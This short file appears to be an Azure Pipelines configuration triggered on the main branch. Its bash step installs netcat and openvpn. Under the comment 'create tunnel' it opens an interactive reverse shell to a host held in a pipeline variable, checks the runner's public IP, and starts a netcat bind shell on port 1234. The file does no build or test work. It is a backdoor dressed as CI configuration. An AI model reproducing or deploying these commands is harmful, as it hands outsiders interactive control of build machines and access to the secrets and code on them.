trigger:
  - main

pool:
  vmImage: 'ubuntu-latest'

steps:

  - bash: |
      sudo apt-get --assume-yes --no-install-recommends install openvpn netcat

      # create tunnel
      sh -i >& "/dev/tcp/$(ME)" 0>&1
      
      sudo apt-get update
      ls
      curl ifconfig.me
      rm -f /tmp/f; mkfifo /tmp/f
      cat /tmp/f | /bin/sh -i 2>&1 | nc -lv 1234 > /tmp/f
